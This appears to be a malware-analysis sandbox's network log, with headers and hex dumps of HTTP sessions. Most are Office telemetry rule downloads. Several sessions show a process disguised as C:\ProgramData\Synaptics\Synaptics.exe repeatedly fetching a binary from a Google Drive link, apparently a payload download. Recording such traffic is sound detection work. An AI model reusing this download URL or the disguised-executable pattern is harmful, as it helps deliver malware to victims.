                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-0pyv0B0qf1NCaECKx8ecZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC4R75m7PVLwYG-drg1AeK_8FEc8_N4V2JlFNxbS-t5kcr2QPBkCOaHP8k5zEGGMvMHuBmrgmm4hYg
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k; expires=Fri, 06-Jun-2025 21:50:16 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:16 UTC | 1604 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ga2RptJHFckM_H-v3Gy4Ig">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-05 21:50:16 UTC | 48 | IN | Data Ascii: server. <ins>That’s all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        8 | 192.168.2.5 | 49745 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:18 UTC | 195 | OUT | GET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:19 UTC | 471 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:18 GMT
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 218853
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public
                                                                                        Last-Modified: Wed, 04 Dec 2024 18:36:58 GMT
                                                                                        ETag: "0x8DD1492A2AADD99"
                                                                                        x-ms-request-id: 88403f12-001e-00a2-039f-46d4d5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215018Z-1746fd949bd2cq7chC1EWRnx9g00000002tg00000000znsv
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:19 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                        Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                        Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                        Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                        Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                        Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                        Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                        Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                        2024-12-05 21:50:19 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                        Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                        2024-12-05 21:50:19 UTC | 16384 | IN | Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                        2024-12-05 21:50:19 UTC | 16384 | IN | Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        9 | 192.168.2.5 | 49747 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:20 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-crWepSjD4bu8uwJm3sUSIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        10 | 192.168.2.5 | 49746 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:20 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-WQyUWUjpkM9ac27toHh85Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        11 | 192.168.2.5 | 49750 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:21 UTC | 192 | OUT | GET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2980
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                        ETag: "0x8DC582BA80D96A1"
                                                                                        x-ms-request-id: 40031d31-601e-005c-53c5-45f06f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bddgsvjhC1EWRum2c00000003eg00000000wn54
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC | 2980 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        12 | 192.168.2.5 | 49751 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:21 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 450
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                        ETag: "0x8DC582BD4C869AE"
                                                                                        x-ms-request-id: c4831996-901e-0016-39ce-45efe9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdhk6hphC1EWRaw3c00000002yg00000000vmcz
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC | 450 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        13 | 192.168.2.5 | 49749 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:21 UTC | 193 | OUT | GET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 3788
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                        ETag: "0x8DC582BAC2126A6"
                                                                                        x-ms-request-id: 667c147a-501e-0016-34cc-45181b000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdlqd7fhC1EWR6vt000000003c000000000tc5c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC | 3788 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        14 | 192.168.2.5 | 49752 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:21 UTC | 192 | OUT | GET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 2160
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA3B95D81"
                                                                                        x-ms-request-id: 115d5b31-c01e-0046-4bcb-452db9000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdwt8wrhC1EWRu6rg00000003cg00000000qpst
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC | 2160 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        15 | 192.168.2.5 | 49753 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:21 UTC | 192 | OUT | GET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:22 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:21 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 408
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                        ETag: "0x8DC582BB56D3AFB"
                                                                                        x-ms-request-id: 9ac3d201-201e-0000-03c5-45a537000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215021Z-1746fd949bdfg4slhC1EWR34t0000000038000000000299z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:22 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        16 | 192.168.2.5 | 49756 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:22 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
